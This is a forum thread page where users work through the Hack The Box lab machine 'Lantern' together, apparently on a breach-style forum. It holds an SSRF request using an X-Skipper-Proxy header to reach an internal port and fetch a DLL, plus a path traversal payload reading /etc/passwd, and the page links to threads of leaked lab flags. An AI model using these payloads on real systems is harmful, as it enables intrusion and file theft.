[HTB] Lantern
by RedTeamer - Saturday August 17, 2024 at 10:14 AM
#31
(08-17-2024, 09:12 PM)htbtester12 Wrote:
(08-17-2024, 09:10 PM)osamy7593 Wrote:
(08-17-2024, 09:04 PM)jsvensson Wrote:
(08-17-2024, 09:02 PM)osamy7593 Wrote:
(08-17-2024, 08:58 PM)jsvensson Wrote: using dotpeek i found it - do you know with dnspy doesn't ?

u used pdf for ssrf?
for ssrf just add header  X-Skipper-Proxy: http://127.0.0.1:5000 in burp on request to / and then you will be able to get  /_framework/InternaLantern.dll

tells failed to connect

GET /_framework/InternaLantern.dll HTTP/1.1
X-Skipper-Proxy: http://127.0.0.1:5000
Host: lantern.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Should not be: Host: lantern.htb:5000

remove :5000 from the Host header
nive worked
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#32
Anybody got shell???
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#33
we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd
Reply
#34
(08-17-2024, 09:54 PM)jsvensson Wrote: we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd

i tried from it to execute my uploaded .php not work only reads file its path traversal not lfi
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#35
(08-17-2024, 10:10 PM)osamy7593 Wrote:
(08-17-2024, 09:54 PM)jsvensson Wrote: we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd

i tried from it to execute my uploaded .php not work only reads file its path traversal not lfi

yes my bad it's just path traversal

when try to manually change module got an error occurred: Could not load file or assembly '/opt/components/Fiasd.dll'.
not sure if we could do something with it
Reply
#36
(08-17-2024, 10:10 PM)osamy7593 Wrote:
(08-17-2024, 09:54 PM)jsvensson Wrote: we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd

i tried from it to execute my uploaded .php not work only reads file its path traversal not lfi
akhee its a python and dotnet page , no php stuff here.
Reply
#37
(08-17-2024, 10:14 PM)jsvensson Wrote:
(08-17-2024, 10:10 PM)osamy7593 Wrote:
(08-17-2024, 09:54 PM)jsvensson Wrote: we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd

i tried from it to execute my uploaded .php not work only reads file its path traversal not lfi

yes my bad it's just path traversal

when try to manually change module got an error occurred: Could not load file or assembly '/opt/components/Fiasd.dll'.
not sure if we could do something with it
also noticed but i think no benefit
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#38
we have lfi try get Data.db
Reply
#39
(08-17-2024, 10:28 PM)Anaunimans Wrote: we have lfi try get Data.db

Thats what i am thinking but whats the root directory?
Reply
#40
(08-17-2024, 10:30 PM)letsnotencrypt Wrote:
(08-17-2024, 10:28 PM)Anaunimans Wrote: we have lfi try get Data.db

Thats what i am thinking but whats the root directory?

Same question here
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,348 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 350 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 646 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)